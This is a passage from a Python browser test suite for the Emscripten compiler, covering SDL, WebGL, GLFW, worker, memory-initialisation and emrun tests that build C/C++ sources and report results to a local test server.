self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', reference='htmltest.png')
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1'])
def test_s3tc_crunch(self):
try:
print 'Crunch is located at ' + CRUNCH
except NameError: # CRUNCH is only defined when crunch is configured
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
def test(args):
print args
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
open('text.txt', 'w').write('123')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'] + args, stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1'])
test([])
test(['text.txt']) # also package a non-crunch file
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
try:
print 'Crunch is located at ' + CRUNCH
except NameError: # CRUNCH is only defined when crunch is configured
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1'])
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print 'passed asm test'
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png')
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png')
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_runtimelink(self):
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.js', '-s', 'SIDE_MODULE=1', '-O2']).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.js"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
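// run() is now deferred until the matching removeRunDependency() below fires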
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print what, status
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['--pre-js', 'pre.js', '--memory-init-file', '1'])
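# a reachable .mem URL should load normally (1); a bogus URL should trip the
# memoryInitializerRequest warning path (0)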
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
Module.print('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
Module.print('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
Module.print('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
Module.print('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:8888/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
'''
open('pre_main.js', 'w').write(r'''
Module._main = function(){
myJSCallback();
return 0;
};
''')
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_main.js'], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
print '\n', filename, extra_args
print 'mem init, so async, call too early'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1'] + extra_args)
print 'sync startup, call too late'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args)
print 'sync, runtime still alive, so all good'
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=1'] + extra_args)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js')], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: this test only worked in non-fastcomp, which is deprecated
def test_module(self):
return self.skip('non-fastcomp is deprecated and fails in 3.5')
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
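# exercise both packaging modes: the default (file data copied into the heap)
# and --no-heap-copy, which keeps the packaged data outside the heap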
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'])
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = subprocess.check_output([PYTHON, path_from_root('emrun'), '--list_browsers'])
assert 'Traceback' not in result
def test_emrun(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory that the suite cleans up afterwards: the launched
# browser would have it as its startup directory, and since the browser does not close as part of
# the test, on Windows that would pin down the cwd and make the directory impossible to delete.
# Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if emscripten_browser is not None:
# If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser, (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun, so strip them out.
browser_name = shlex.split(emscripten_browser)[0]
args += ['--browser', browser_name]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print out
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1')
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (typeof Module === 'undefined') Module = eval('(function() { try { return Module || {} } catch(e) { return {} } })()');
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
Module['addRunDependency']('test_run_dependency');
Module['removeRunDependency']('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts, expected='0', timeout=20)
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html')], expected='0', timeout=20)
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-s', 'NO_EXIT_RUNTIME=1'], expected='0', timeout=20)
def test_webgl_context_params(self):
if WINDOWS: return self.skip('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print opts
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1'], expected='0')
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print opts
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_codemods(self):
for opt_level in [0, 2]:
print 'opt level', opt_level
opts = '-O' + str(opt_level)
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
# now use a shell to remove the browser's fround support
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', '''
Math.fround = null;
var Module = {
'''))
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, no browser support, so semantics are like double
# finally, remove fround, patch up fround as the code executes (after polyfilling etc.), to verify that we got rid of it entirely on the client side
fixer = 'python fix.py'
open('fix.py', 'w').write(r'''
import sys
filename = sys.argv[1]
js = open(filename).read()
replaced = js.replace("var Math_fround = Math.fround;", "var Math_fround = Math.fround = function(x) { return 0; }")
assert js != replaced
open(filename, 'w').write(replaced)
''')
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer]) # no fround anyhow
self.btest(path_from_root('tests', 'codemods.cpp'), expected='121378', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=1']) # a proper polyfill was put in place, but the fixer then replaced it so 0 is returned every time, hence the different result here
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=[opts, '--shell-file', 'shell.html', '--js-transform', fixer, '-s', 'PRECISE_F32=2', '--separate-asm']) # we should remove the calls to the polyfill ENTIRELY here, on the clientside, so we should NOT see any calls to fround here, and result should be like double
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print 'asyncify+emterpreter'
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT();
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html']).communicate()
os.mkdir('sub')
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print 'in html'
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html'] + args).communicate()
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
open('src.cpp', 'w').write(self.with_report_result(r'''
#include<stdio.h>
#include<emscripten.h>
int main() {
int result = EM_ASM_INT_V({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT();
return 0;
}
'''))
in_html('200', ['-s', 'FORCE_FILESYSTEM=1'])
def test_glfw3(self):
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3'], expected='1')
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2"], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3"], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['_main'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print opts
opts += ['-s', 'NO_EXIT_RUNTIME=1', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print 'Skipping asm validation check, spidermonkey is not configured'
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
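# the 'src@/dst' form of --preload-file mounts the source file at a custom
# path in the virtual filesystem; both spellings below should behave the same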
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED','-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
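# only a single (empty) defines set for now; the loop leaves room for -D variants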
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
